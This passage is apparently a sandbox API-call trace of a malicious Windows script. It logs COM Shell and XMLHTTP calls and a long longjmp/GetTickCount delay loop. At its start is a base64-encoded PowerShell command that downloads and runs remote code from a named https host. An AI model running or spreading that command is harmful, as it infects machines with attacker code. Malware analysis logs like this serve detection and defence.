SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26c150*=0x0) returned 0x0
	[0099.293] Shell:IUnknown:Release (This=0x649a5e0) returned 0x1
	[0099.293] XMLHTTPRequest:IUnknown:Release (This=0x42ef40) returned 0x0
	[0099.293] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0099.294] IUnknown:Release (This=0x3ea060) returned 0x0
	[0099.294] IUnknown:Release (This=0x648a520) returned 0x0
	[0099.294] ??3@YAXPEAX@Z () returned 0xab00020001
	[0099.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0099.296] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0099.296] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0099.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0099.296] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0099.297] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0099.297] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0099.297] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0099.297] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0099.300] GetTickCount () returned 0x11500cc
	[0099.300] longjmp () 
	[0099.300] longjmp () 
	[0099.300] longjmp () 
	[0099.301] GetCurrentThreadId () returned 0x9a8
	[0099.301] GetCurrentThreadId () returned 0x9a8
	[0099.301] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0099.301] malloc (_Size=0x80) returned 0x3c88b0
	[0099.301] longjmp () 
	[0099.301] longjmp () 
	[0099.301] longjmp () 
	[0099.301] longjmp () 
	[0099.301] longjmp () 
	[0099.302] longjmp () 
	[0099.302] longjmp () 
	[0099.302] longjmp () 
	[0099.302] longjmp () 
	[0099.302] longjmp () 
	[0099.302] longjmp () 
	[0099.302] longjmp () 
	[0099.303] longjmp () 
	[0099.303] longjmp () 
	[0099.303] longjmp () 
	[0099.303] longjmp () 
	[0099.303] longjmp () 
	[0099.303] longjmp () 
	[0099.303] longjmp () 
	[0099.304] longjmp () 
	[0099.304] longjmp () 
	[0099.304] longjmp () 
	[0099.304] longjmp () 
	[0099.304] longjmp () 
	[0099.304] longjmp () 
	[0099.305] longjmp () 
	[0099.305] longjmp () 
	[0099.305] longjmp () 
	[0099.305] longjmp () 
	[0099.305] GetTickCount () returned 0x11500cc
	[0099.305] longjmp () 
	[0099.306] longjmp () 
	[0099.306] longjmp () 
	[0099.306] longjmp () 
	[0099.306] longjmp () 
	[0099.306] longjmp () 
	[0099.306] longjmp () 
	[0099.307] longjmp () 
	[0099.307] longjmp () 
	[0099.307] longjmp () 
	[0099.307] longjmp () 
	[0099.307] longjmp () 
	[0099.307] longjmp () 
	[0099.308] longjmp () 
	[0099.308] longjmp () 
	[0099.308] longjmp () 
	[0099.308] longjmp () 
	[0099.308] longjmp () 
	[0099.308] longjmp () 
	[0099.308] longjmp () 
	[0099.309] longjmp () 
	[0099.309] longjmp () 
	[0099.309] longjmp () 
	[0099.309] longjmp () 
	[0099.309] longjmp () 
	[0099.309] longjmp () 
	[0099.310] longjmp () 
	[0099.310] longjmp () 
	[0099.310] longjmp () 
	[0099.311] longjmp () 
	[0099.311] longjmp () 
	[0099.311] longjmp () 
	[0099.311] GetTickCount () returned 0x11500dc
	[0099.311] longjmp () 
	[0099.311] longjmp () 
	[0099.311] longjmp () 
	[0099.311] longjmp () 
	[0099.312] longjmp () 
	[0099.312] longjmp () 
	[0099.312] longjmp () 
	[0099.312] longjmp () 
	[0099.312] longjmp () 
	[0099.313] longjmp () 
	[0099.313] longjmp () 
	[0099.313] longjmp () 
	[0099.313] longjmp () 
	[0099.313] longjmp () 
	[0099.313] longjmp () 
	[0099.313] longjmp () 
	[0099.314] longjmp () 
	[0099.314] longjmp () 
	[0099.314] longjmp () 
	[0099.314] longjmp () 
	[0099.314] longjmp () 
	[0099.314] longjmp () 
	[0099.314] longjmp () 
	[0099.315] longjmp () 
	[0099.315] longjmp () 
	[0099.315] longjmp () 
	[0099.315] longjmp () 
	[0099.315] longjmp () 
	[0099.315] longjmp () 
	[0099.316] longjmp () 
	[0099.316] longjmp () 
	[0099.316] longjmp () 
	[0099.316] GetTickCount () returned 0x11500dc
	[0099.316] longjmp () 
	[0099.316] longjmp () 
	[0099.316] longjmp () 
	[0099.316] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.317] longjmp () 
	[0099.318] longjmp () 
	[0099.318] longjmp () 
	[0099.318] longjmp () 
	[0099.318] longjmp () 
	[0099.318] longjmp () 
	[0099.318] longjmp () 
	[0099.319] longjmp () 
	[0099.319] longjmp () 
	[0099.319] longjmp () 
	[0099.319] longjmp () 
	[0099.319] longjmp () 
	[0099.319] longjmp () 
	[0099.319] longjmp () 
	[0099.320] longjmp () 
	[0099.320] longjmp () 
	[0099.320] longjmp () 
	[0099.320] longjmp () 
	[0099.320] longjmp () 
	[0099.320] longjmp () 
	[0099.320] longjmp () 
	[0099.320] GetTickCount () returned 0x11500dc
	[0099.321] longjmp () 
	[0099.321] longjmp () 
	[0099.321] longjmp () 
	[0099.321] longjmp () 
	[0099.321] longjmp () 
	[0099.321] longjmp () 
	[0099.321] longjmp () 
	[0099.322] longjmp () 
	[0099.322] longjmp () 
	[0099.322] longjmp () 
	[0099.322] longjmp () 
	[0099.322] longjmp () 
	[0099.322] longjmp () 
	[0099.322] longjmp () 
	[0099.323] longjmp () 
	[0099.323] longjmp () 
	[0099.323] longjmp () 
	[0099.323] longjmp () 
	[0099.323] longjmp () 
	[0099.323] longjmp () 
	[0099.323] longjmp () 
	[0099.324] longjmp () 
	[0099.324] longjmp () 
	[0099.324] longjmp () 
	[0099.324] longjmp () 
	[0099.324] longjmp () 
	[0099.324] longjmp () 
	[0099.324] longjmp () 
	[0099.325] longjmp () 
	[0099.325] longjmp () 
	[0099.325] longjmp () 
	[0099.325] longjmp () 
	[0099.325] GetTickCount () returned 0x11500dc
	[0099.325] longjmp () 
	[0099.325] longjmp () 
	[0099.326] longjmp () 
	[0099.326] longjmp () 
	[0099.326] longjmp () 
	[0099.326] longjmp () 
	[0099.326] longjmp () 
	[0099.327] longjmp () 
	[0099.327] longjmp () 
	[0099.327] longjmp () 
	[0099.327] longjmp () 
	[0099.327] longjmp () 
	[0099.327] longjmp () 
	[0099.328] longjmp () 
	[0099.328] longjmp () 
	[0099.328] longjmp () 
	[0099.328] longjmp () 
	[0099.328] longjmp () 
	[0099.328] longjmp () 
	[0099.328] longjmp () 
	[0099.329] longjmp () 
	[0099.329] longjmp () 
	[0099.329] longjmp () 
	[0099.329] longjmp () 
	[0099.329] longjmp () 
	[0099.330] longjmp () 
	[0099.330] longjmp () 
	[0099.330] longjmp () 
	[0099.330] longjmp () 
	[0099.330] longjmp () 
	[0099.330] longjmp () 
	[0099.330] longjmp () 
	[0099.331] GetTickCount () returned 0x11500eb
	[0099.331] longjmp () 
	[0099.331] longjmp () 
	[0099.331] longjmp () 
	[0099.331] longjmp () 
	[0099.331] longjmp () 
	[0099.331] longjmp () 
	[0099.332] longjmp () 
	[0099.332] longjmp () 
	[0099.332] longjmp () 
	[0099.332] longjmp () 
	[0099.332] longjmp () 
	[0099.332] longjmp () 
	[0099.332] longjmp () 
	[0099.333] longjmp () 
	[0099.333] longjmp () 
	[0099.333] longjmp () 
	[0099.333] longjmp () 
	[0099.333] longjmp () 
	[0099.333] longjmp () 
	[0099.333] longjmp () 
	[0099.334] longjmp () 
	[0099.334] longjmp () 
	[0099.334] longjmp () 
	[0099.334] longjmp () 
	[0099.334] longjmp () 
	[0099.334] longjmp () 
	[0099.334] longjmp () 
	[0099.335] longjmp () 
	[0099.335] longjmp () 
	[0099.335] longjmp () 
	[0099.335] longjmp () 
	[0099.335] longjmp () 
	[0099.335] GetTickCount () returned 0x11500eb
	[0099.335] longjmp () 
	[0099.335] longjmp () 
	[0099.336] longjmp () 
	[0099.336] longjmp () 
	[0099.336] longjmp () 
	[0099.336] longjmp () 
	[0099.336] longjmp () 
	[0099.336] longjmp () 
	[0099.337] longjmp () 
	[0099.337] longjmp () 
	[0099.337] longjmp () 
	[0099.337] longjmp () 
	[0099.337] longjmp () 
	[0099.337] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.338] longjmp () 
	[0099.339] longjmp () 
	[0099.339] longjmp () 
	[0099.339] longjmp () 
	[0099.339] longjmp () 
	[0099.339] longjmp () 
	[0099.339] longjmp () 
	[0099.339] longjmp () 
	[0099.340] longjmp () 
	[0099.340] longjmp () 
	[0099.340] longjmp () 
	[0099.340] GetTickCount () returned 0x11500eb
	[0099.340] longjmp () 
	[0099.340] longjmp () 
	[0099.340] longjmp () 
	[0099.340] longjmp () 
	[0099.341] longjmp () 
	[0099.341] longjmp () 
	[0099.341] longjmp () 
	[0099.341] longjmp () 
	[0099.341] longjmp () 
	[0099.343] longjmp () 
	[0099.343] longjmp () 
	[0099.343] longjmp () 
	[0099.343] longjmp () 
	[0099.343] longjmp () 
	[0099.344] longjmp () 
	[0099.344] longjmp () 
	[0099.344] longjmp () 
	[0099.344] longjmp () 
	[0099.344] longjmp () 
	[0099.344] longjmp () 
	[0099.344] longjmp () 
	[0099.345] longjmp () 
	[0099.345] longjmp () 
	[0099.345] longjmp () 
	[0099.345] longjmp () 
	[0099.345] longjmp () 
	[0099.345] longjmp () 
	[0099.345] longjmp () 
	[0099.346] longjmp () 
	[0099.346] longjmp () 
	[0099.346] longjmp () 
	[0099.346] longjmp () 
	[0099.346] GetTickCount () returned 0x11500fb
	[0099.346] longjmp () 
	[0099.346] longjmp () 
	[0099.347] longjmp () 
	[0099.347] longjmp () 
	[0099.347] longjmp () 
	[0099.347] longjmp () 
	[0099.347] longjmp () 
	[0099.347] longjmp () 
	[0099.348] longjmp () 
	[0099.348] longjmp () 
	[0099.348] longjmp () 
	[0099.348] longjmp () 
	[0099.348] longjmp () 
	[0099.348] longjmp () 
	[0099.348] longjmp () 
	[0099.349] longjmp () 
	[0099.349] longjmp () 
	[0099.349] longjmp () 
	[0099.349] longjmp () 
	[0099.349] longjmp () 
	[0099.349] longjmp () 
	[0099.350] longjmp () 
	[0099.350] longjmp () 
	[0099.350] longjmp () 
	[0099.350] longjmp () 
	[0099.350] longjmp () 
	[0099.350] longjmp () 
	[0099.351] longjmp () 
	[0099.351] longjmp () 
	[0099.351] longjmp () 
	[0099.351] longjmp () 
	[0099.351] longjmp () 
	[0099.351] GetTickCount () returned 0x11500fb
	[0099.351] longjmp () 
	[0099.351] longjmp () 
	[0099.352] longjmp () 
	[0099.352] longjmp () 
	[0099.352] longjmp () 
	[0099.352] longjmp () 
	[0099.352] longjmp () 
	[0099.352] longjmp () 
	[0099.353] longjmp () 
	[0099.353] longjmp () 
	[0099.353] longjmp () 
	[0099.353] longjmp () 
	[0099.353] longjmp () 
	[0099.353] longjmp () 
	[0099.354] longjmp () 
	[0099.354] longjmp () 
	[0099.354] longjmp () 
	[0099.354] longjmp () 
	[0099.354] longjmp () 
	[0099.354] longjmp () 
	[0099.354] longjmp () 
	[0099.355] longjmp () 
	[0099.355] longjmp () 
	[0099.355] longjmp () 
	[0099.355] longjmp () 
	[0099.355] longjmp () 
	[0099.355] longjmp () 
	[0099.356] longjmp () 
	[0099.356] longjmp () 
	[0099.356] longjmp () 
	[0099.356] longjmp () 
	[0099.356] longjmp () 
	[0099.356] GetTickCount () returned 0x11500fb
	[0099.356] longjmp () 
	[0099.357] longjmp () 
	[0099.357] longjmp () 
	[0099.357] longjmp () 
	[0099.357] longjmp () 
	[0099.358] longjmp () 
	[0099.358] longjmp () 
	[0099.358] longjmp () 
	[0099.358] longjmp () 
	[0099.358] longjmp () 
	[0099.358] longjmp () 
	[0099.358] longjmp () 
	[0099.359] longjmp () 
	[0099.359] longjmp () 
	[0099.359] longjmp () 
	[0099.359] longjmp () 
	[0099.359] longjmp () 
	[0099.359] longjmp () 
	[0099.360] longjmp () 
	[0099.360] longjmp () 
	[0099.360] longjmp () 
	[0099.360] longjmp () 
	[0099.360] longjmp () 
	[0099.360] longjmp () 
	[0099.360] longjmp () 
	[0099.361] longjmp () 
	[0099.361] longjmp () 
	[0099.361] longjmp () 
	[0099.361] longjmp () 
	[0099.361] longjmp () 
	[0099.361] longjmp () 
	[0099.361] longjmp () 
	[0099.362] GetTickCount () returned 0x115010a
	[0099.362] longjmp () 
	[0099.362] longjmp () 
	[0099.362] longjmp () 
	[0099.362] longjmp () 
	[0099.362] longjmp () 
	[0099.362] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.363] longjmp () 
	[0099.364] longjmp () 
	[0099.364] longjmp () 
	[0099.364] longjmp () 
	[0099.364] longjmp () 
	[0099.364] longjmp () 
	[0099.364] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.365] longjmp () 
	[0099.366] longjmp () 
	[0099.366] longjmp () 
	[0099.366] longjmp () 
	[0099.366] longjmp () 
	[0099.366] GetTickCount () returned 0x115010a
	[0099.366] longjmp () 
	[0099.366] longjmp () 
	[0099.366] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.367] longjmp () 
	[0099.368] longjmp () 
	[0099.368] longjmp () 
	[0099.368] longjmp () 
	[0099.368] longjmp () 
	[0099.368] longjmp () 
	[0099.370] longjmp () 
	[0099.370] longjmp () 
	[0099.370] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0099.370] SysStringLen (param_1=0x0) returned 0x0
	[0099.370] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0099.370] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0099.370] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0099.370] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0099.370] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a7688) returned 0x0
	[0099.370] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0099.370] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a7688, pUnkSite=0x3cacc0) returned 0x0
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0099.371] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0099.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0099.371] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0099.371] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0099.372] XMLHTTPRequest:IUnknown:Release (This=0x47a7688) returned 0x0
